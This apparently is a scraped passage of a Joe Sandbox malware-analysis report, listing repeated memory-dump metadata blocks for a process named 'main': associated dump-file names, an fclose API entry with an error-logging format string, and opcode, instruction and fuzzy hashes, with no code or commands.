                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction ID: 030b448e08b1d9aa3eefe5524eabd899fdb9b589966e13d600e2de4ca03caef2
                                    • Opcode Fuzzy Hash: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction Fuzzy Hash: BCF05433B0B207C2F963BB04B4417B995521F55379E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction ID: c0a2e7e7b9d2896269db39d0b3f7c6517c3bc0fcd08a69a2047652da24dbc3c2
                                    • Opcode Fuzzy Hash: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction Fuzzy Hash: EEF05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction ID: b51046235e59f39a8a5d9966367ab339c36a50904b4f04dbb66a8eb97c82f662
                                    • Opcode Fuzzy Hash: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction Fuzzy Hash: D1F03023A0B106C2F963AA04B4417B995521F55378E8B0AB5CD490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction ID: 98d7d57c4263d53081a7936a905f9c672a45915a92f2f87a3917f44ba7434e07
                                    • Opcode Fuzzy Hash: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction Fuzzy Hash: A5F05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA9C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction ID: 98d7d57c4263d53081a7936a905f9c672a45915a92f2f87a3917f44ba7434e07
                                    • Opcode Fuzzy Hash: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction Fuzzy Hash: A5F05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA9C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction ID: 98d7d57c4263d53081a7936a905f9c672a45915a92f2f87a3917f44ba7434e07
                                    • Opcode Fuzzy Hash: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction Fuzzy Hash: A5F05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA9C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction ID: 030b448e08b1d9aa3eefe5524eabd899fdb9b589966e13d600e2de4ca03caef2
                                    • Opcode Fuzzy Hash: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction Fuzzy Hash: BCF05433B0B207C2F963BB04B4417B995521F55379E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction ID: 72772b8673c10ed9cafe45aad5980bdd99ba1260919da5cd69bf31edb99e793b
                                    • Opcode Fuzzy Hash: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction Fuzzy Hash: 53F03023B0B106C2F963AA04B4417B995522F55378E8B0AB58D480A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction ID: b51046235e59f39a8a5d9966367ab339c36a50904b4f04dbb66a8eb97c82f662
                                    • Opcode Fuzzy Hash: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction Fuzzy Hash: D1F03023A0B106C2F963AA04B4417B995521F55378E8B0AB5CD490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction ID: 54bd699ae22562beec09e08ef17eb5b5a256da3638fa963e94642d4215f613aa
                                    • Opcode Fuzzy Hash: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction Fuzzy Hash: 51F03023A0B106C2F963AA04B4417B995521F55378E8B0AB58D490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction ID: c0a2e7e7b9d2896269db39d0b3f7c6517c3bc0fcd08a69a2047652da24dbc3c2
                                    • Opcode Fuzzy Hash: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction Fuzzy Hash: EEF05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction ID: 54bd699ae22562beec09e08ef17eb5b5a256da3638fa963e94642d4215f613aa
                                    • Opcode Fuzzy Hash: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction Fuzzy Hash: 51F03023A0B106C2F963AA04B4417B995521F55378E8B0AB58D490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction ID: 030b448e08b1d9aa3eefe5524eabd899fdb9b589966e13d600e2de4ca03caef2
                                    • Opcode Fuzzy Hash: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction Fuzzy Hash: BCF05433B0B207C2F963BB04B4417B995521F55379E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction ID: c0a2e7e7b9d2896269db39d0b3f7c6517c3bc0fcd08a69a2047652da24dbc3c2
                                    • Opcode Fuzzy Hash: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction Fuzzy Hash: EEF05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction ID: b51046235e59f39a8a5d9966367ab339c36a50904b4f04dbb66a8eb97c82f662
                                    • Opcode Fuzzy Hash: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction Fuzzy Hash: D1F03023A0B106C2F963AA04B4417B995521F55378E8B0AB5CD490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 5bc20ac583c950df92259a1b8d7f14786c9909c5f1ae333172e60870b9f1a24e
                                    • Instruction ID: 819a58902e7bed1fa550209c1452f8b4582f3ae0dda1273d5c1ad3c6e0db3697
                                    • Opcode Fuzzy Hash: 5bc20ac583c950df92259a1b8d7f14786c9909c5f1ae333172e60870b9f1a24e
                                    • Instruction Fuzzy Hash: 88F03023A0B106C2F963AB04B4417B995521F55368E8B0AB58D490A6F1AE3EA9879320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction ID: 72772b8673c10ed9cafe45aad5980bdd99ba1260919da5cd69bf31edb99e793b
                                    • Opcode Fuzzy Hash: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction Fuzzy Hash: 53F03023B0B106C2F963AA04B4417B995522F55378E8B0AB58D480A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction ID: 030b448e08b1d9aa3eefe5524eabd899fdb9b589966e13d600e2de4ca03caef2
                                    • Opcode Fuzzy Hash: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction Fuzzy Hash: BCF05433B0B207C2F963BB04B4417B995521F55379E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction ID: 72772b8673c10ed9cafe45aad5980bdd99ba1260919da5cd69bf31edb99e793b
                                    • Opcode Fuzzy Hash: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction Fuzzy Hash: 53F03023B0B106C2F963AA04B4417B995522F55378E8B0AB58D480A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
